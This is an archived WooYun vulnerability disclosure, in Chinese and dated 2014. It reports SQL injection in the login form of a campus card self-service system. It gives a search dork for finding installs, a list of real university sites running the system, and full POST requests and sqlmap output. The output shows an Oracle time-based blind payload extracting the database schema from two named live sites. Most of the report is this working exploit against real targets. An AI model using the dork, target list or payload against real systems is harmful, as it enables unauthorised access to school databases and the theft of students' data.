乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-30: 细节已通知厂商并且等待厂商处理中 2014-10-05: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-11-29: 细节向核心白帽子及相关领域专家公开 2014-12-09: 细节向普通白帽子公开 2014-12-19: 细节向实习白帽子公开 2014-12-26: 细节向公众公开
...
版权所有:郑州新开普电子技术有限公司 百度dork:一卡通自助查询管理系统--首页 漏洞页面:UserLogin.aspx(用户登录框) 漏洞参数:txtUserName 网站架构:Aspx + Oracle
收集案例: http://ecard.sdut.edu.cn/ http://ecard.bzmc.edu.cn/ http://ecard.sdca.edu.cn/ http://59.173.236.220/SelfSearch/Default.aspx http://202.115.192.98/SelfSearch/ http://ykt.szetop.com/SelfSearch/ http://yktweb.cqie.cn/default.aspx http://www.zhengzhong.cn/selfsearch/ http://221.224.167.141/selfsearch/ http://zzcx.scujjedu.cn:114/ http://202.101.244.45/selfsearch/
<漏洞证明>1# http://ecard.sdut.edu.cn
测试数据POST /UserInfo/UserLogin.aspx HTTP/1.1Host: ecard.sdut.edu.cnProxy-Connection: keep-aliveContent-Length: 511Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://ecard.sdut.edu.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://ecard.sdut.edu.cn/UserInfo/UserLogin.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: ASP.NET_SessionId=mczm4gqd5k5bqknbrab5phbc__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTczODI0OTkzNQ9kFgICAw9kFgQCAw8PFgIeB1Zpc2libGVnZBYCAgEPDxYCHgRUZXh0BQznlKjmiLflkI3vvJpkZAIFDw8WAh8AaGQWBAIBDw8WAh8BBQ3plJnor6%2Fljp%2Flm6A6ZGQCAw8PFgIfAQVC5p%2Bl6K%2Bi57uT5p6c5Li656m677yM6L6T5YWl55qE55So5oi35LiN5a2Y5Zyo5oiW5bey5oiQ5biQ5aSW5Y2h77yBZGRkBoGAKLFhS9bp5K80l7EDTTWuKi4%3D&__EVENTVALIDATION=%2FwEWBgKwwJj9CQKl1bKzCQKd%2B7qdDgKY2YWXBgKTgvWHDQLJk9%2FkDImwNsGU0pQlSSMzEwopYl%2FPMVGy&txtUserName=*&txtPwd=123123&txtCheckCode=6174&btnUserLogin=
测试结果sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: #1* Type: AND/OR time-based blind Title: Oracle AND time-based blind (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTczODI0OTkzNQ9kFgICAw9kFgQCAw8PFgIeB1Zpc2libGVnZBYCAgEPDxYCHgRUZXh0BQznlKjmiLflkI3vvJpkZAIFDw8WAh8AaGQWBAIBDw8WAh8BBQ3plJnor6/ljp/lm6A6ZGQCAw8PFgIfAQVC5p+l6K+i57uT5p6c5Li656m677yM6L6T5YWl55qE55So5oi35LiN5a2Y5Zyo5oiW5bey5oiQ5biQ5aSW5Y2h77yBZGRkBoGAKLFhS9bp5K80l7EDTTWuKi4=&__EVENTVALIDATION=/wEWBgKwwJj9CQKl1bKzCQKd+7qdDgKY2YWXBgKTgvWHDQLJk9/kDImwNsGU0pQlSSMzEwopYl/PMVGy&txtUserName=%' AND 6545=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(109)||CHR(118)||CHR(84),5)--&txtPwd=123123&txtCheckCode=6174&btnUserLogin=---[09:35:55] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Oracle[09:35:55] [INFO] fetching current database[09:35:55] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n][09:36:11] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsC[09:36:24] [INFO] adjusting time delay to 1 second due to good response timesCENSE[09:36:52] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): 'CCENSE'[09:36:52] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\ecard.sdut.edu.cn'[*] shutting down at 09:36:52
2# http://zzcx.scujjedu.cn:114/
测试数据POST /UserInfo/UserLogin.aspx HTTP/1.1Host: zzcx.scujjedu.cn:114Proxy-Connection: keep-aliveContent-Length: 335Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://zzcx.scujjedu.cn:114User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://zzcx.scujjedu.cn:114/UserInfo/UserLogin.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: ASP.NET_SessionId=wsjzdsiykimw1w55yaq4oy55__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTUwNTExNDEzMg9kFgICAw9kFgICAQ9kFgICAQ8PFgIeBFRleHQFDOeUqOaIt%2BWQje%2B8mmRkZM%2BiPW9TLYnRwd1iqTJB7MVAWXC%2B&txtUserName=*&txtPwd=admin&txtCheckCode=7687&btnUserLogin=&__EVENTVALIDATION=%2FwEWBgLp%2F6GKAQKl1bKzCQKd%2B7qdDgKY2YWXBgKTgvWHDQLJk9%2FkDPlibsNXwBfNBpqqwnX79i55Bk1M
测试结果sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: #1* Type: AND/OR time-based blind Title: Oracle AND time-based blind (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTUwNTExNDEzMg9kFgICAw9kFgICAQ9kFgICAQ8PFgIeBFRleHQFDOeUqOaIt+WQje+8mmRkZM+iPW9TLYnRwd1iqTJB7MVAWXC+&txtUserName=%' AND 1858=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(116)||CHR(69)||CHR(87),5)--&txtPwd=admin&txtCheckCode=7687&btnUserLogin=&__EVENTVALIDATION=/wEWBgLp/6GKAQKl1bKzCQKd+7qdDgKY2YWXBgKTgvWHDQLJk9/kDPlibsNXwBfNBpqqwnX79i55Bk1M---[09:46:39] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle[09:46:40] [INFO] fetching current database[09:46:40] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n][09:47:00] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[09:47:09] [INFO] adjusting time delay to 2 seconds due to good response times[09:47:09] [ERROR] invalid character detected. retrying..[09:47:09] [WARNING] increasing time delay to 3 seconds[09:47:18] [ERROR] invalid character detected. retrying..[09:47:18] [WARNING] increasing time delay to 4 secondsCCENSE[09:48:42] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): 'CCENSE'[09:48:42] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\zzcx.scujjedu.cn'[*] shutting down at 09:48:42
危害等级:无影响厂商忽略
忽略时间:2014-12-26 11:34
暂无